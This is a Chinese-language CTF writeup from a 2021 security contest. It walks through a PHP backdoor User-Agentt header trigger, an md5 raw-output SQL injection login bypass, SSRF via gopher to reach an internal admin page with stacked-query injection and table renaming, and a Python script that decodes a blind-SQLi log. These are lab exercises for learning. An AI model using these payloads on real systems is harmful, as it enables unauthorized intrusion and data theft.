2021数字中国创新大赛虎符网络安全赛-Writeup

文章目录

• Web

• 签到
• “慢慢做”管理系统

• Misc

• 你会日志分析吗

Web

签到

http://cn-sec.com/archives/313267.html

User-Agentt: zerodiumsystem("cat /flag");

“慢慢做”管理系统

根据题目提示，这里第一步登录应该利用一些字符串被md5($string,true)之后会形成如下，从而造成注入

PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('ffifdyop',true));"
Command line code:1:
string(16) "'or'6�]��!r,��b"
PS C:\Users\Administrator\Downloads>

但是遗憾的是这里的ffifdyop，被过滤了

所以我们需要寻找另一个能和ffifdyop达到同样效果的字符，搜索引擎找一找

PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('129581926211651571912466741651878684928',true));"
Command line code:1:
string(16) "�T0D��o#��'or'8"
PS C:\Users\Administrator\Downloads>

/?username=admin&password=129581926211651571912466741651878684928

成功登录

根据题目的提示，直接在内网找一下admin.php

/ssrf.php?way=127.0.0.1%2Fadmin.php

抓一下这个后台管理系统的包，然后整理一下这个127.0.0.1/admin.php的包，通过gopher协议发送POST数据过去看一下，用python简单处理下

from urllib.parse import quote

payload = "username=mochu7&password=mochu7"

postdata = """
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(len(payload),payload)

final_payload = 'gopher://127.0.0.1:80/_'+ quote(quote(postdata))
print(final_payload)
print(postdata)

gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252031%250A%250Ausername%253Dmochu7%2526password%253Dmochu7%250A

成功发送，接下来测试一下注入，加个单引号看看

username=mochu7'&password=mochu7

直接报错了

很明显这是注入，不过经过后面的fuzz测试发现这里存在，而且这个回显我看着就非常眼熟

username=mochu7';show databases#&password=mochu7

gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252048%250A%250Ausername%253Dmochu7%2527%253Bshow%2520databases%2523%2526password%253Dmochu7%250A

Databases:
ctf
ctf2
information_schema

接着查

username=mochu7';use ctf;show tables#&password=mochu7

gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252053%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf%253Bshow%2520tables%2523%2526password%253Dmochu7%250A

username=mochu7';use ctf2;show tables#&password=mochu7

gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252054%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520tables%2523%2526password%253Dmochu7%250A

Tables_in_ctf:
users
Tables_in_ctf2:
fake_admin
real_admin_here_do_you_find

我们想要找的是真正的admin密码

username=mochu7';use ctf2;show columns from `fake_admin`#&password=mochu7

gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252073%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560fake_admin%2560%2523%2526password%253Dmochu7%250A

username=mochu7';use ctf2;show columns from `real_admin_here_do_you_find`#&password=mochu7

gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252090%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560real_admin_here_do_you_find%2560%2523%2526password%253Dmochu7%250A

本来应该继续查字段内容得到real_admin_here_do_you_find表中的password字段内容，但是这里过滤select、handler等，比赛的时候也就没去研究怎么查询到字段数据了，因为这题很明显像之前强网杯那题，我对那题有印象记得当时有一个通过修改想要查询的表的表名(real_admin_here_do_you_find)为当前使用的表(fake_admin)，然后构造一下注入得到当前表的数据的做法

username=mochu7';rename table fake_admin to mochu7;rename table real_admin_here_do_you_find to fake_admin#&password=mochu7

gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%2520122%250A%250Ausername%253Dmochu7%2527%253Brename%2520table%2520fake_admin%2520to%2520mochu7%253Brename%2520table%2520real_admin_here_do_you_find%2520to%2520fake_admin%2523%2526password%253Dmochu7%250A

username=mochu7'or 1=1;show tables;#&password=mochu7

得到真正的admin密码：5fb4e07de914cfc82afb44vbaf402203 最后传入真正的admin账户名和密码

username=admin&password=5fb4e07de914cfc82afb44vbaf402203

提示我们访问/flag.php，并且查看源码拿着cookie去

Misc

你会日志分析吗

时间盲注日志分析

发现每一位中的这些测试包，都有一个包长度与其他的不一样，那这一位应该就是正确的flag，直接用Python简单处理下

from base64 import *

flag = ''
with open('access.log','r') as f:
    lines = f.readlines()
    for line in lines:
        if "select%20flag%20from%20flllag" in line:
            packet_len = line[line.find(' 200 ')+5:line.find(' "-" "python-requests/2.21.0"')]
            if packet_len == '377':
                ascii_code = line[line.find('))=')+3:line.find(',sleep')]
                ascii_str = chr(int(ascii_code))
                flag += ascii_str
            else:
                pass
        else:
            pass

print(b64decode(flag).decode('utf-8'))

flag{You_are_so_great}